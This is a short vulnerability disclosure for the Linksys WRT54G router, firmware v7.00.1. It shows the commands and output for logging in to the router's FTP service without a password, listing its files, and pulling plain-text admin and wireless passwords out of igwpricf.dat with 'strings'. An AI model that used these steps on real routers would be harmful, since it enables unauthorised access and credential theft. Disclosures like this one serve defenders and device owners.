Linksys WRT54G - read router password from file placed on FTP

Environment: Linksys WRT54G - Firmware Version: v7.00.1

Default settings of Linksys WRT54G allows to get FTP without password:

rafal@localhost ~ $ lftp 192.168.1.1
lftp 192.168.1.1:~> dir
size date time name
-------- ------ ------ --------
956756 Jan-01-2003 02:13:12 ap61.sys
224664 Jan-01-2003 02:13:24 igwhtm.dat
28528 Jan-01-2003 02:13:26 langpak_en
28482 Apr-08-2011 15:36:44 igwpricf.dat
2520 Apr-08-2011 15:11:02 nvram.cfg
2046 Dec-24-2001 00:02:42 calibra.dat

lftp 192.168.1.1:~>

It is possible to download igwpricf.dat file (and another) where plain-text password to web access and wireless network are keeping.

rafal@localhost ~ $ strings igwpricf.dat
Linksys
IntotoSoft
192.168.50.3
Aadmin
PASSWORD
test
best
WIRELESS_PASSWORD
default
langpak_en
TELNET
HTTP
SMTP
POP3

-----------------
RaFD

Relevant Pages

  • Client upload of files via http
    ... I have a potential customer who is looking to be able to upload and download ... files via his and his clients browsers. ... Is this something that lftp is ...
    (Fedora)
  • Re: Installing without getting into livecd mode
    ... To resume the download could solve your problem of disconnecting ... You could use lftp for this task. ... following command: gsudo apt-get install lftp ... Download the iso file with the following command: ...
    (Ubuntu)
  • Re: Ftp client under Mandrake-9.1 question..
    ... I use "lftp" which is installed by default, I think, ... or "ncftp" which you will need to download. ... James M ...
    (comp.os.linux.misc)
  • lftp-3.0.0 - reliable command line driven file transfer program
    ... This is announcement of a new major version of LFTP. ... faster directory caching, no re-parsing each time. ... ftp now follows RFC2640; FEAT, LANG, UTF8 support; new settings ftp:use-feat ... By default mirror removes old files after the transfers. ...
    (comp.os.linux.announce)
  • Problem connecting with lftp
    ... I saw that ftp was using passive mode so I tried that with lftp and it still hangs on the authentication. ...
    (Fedora)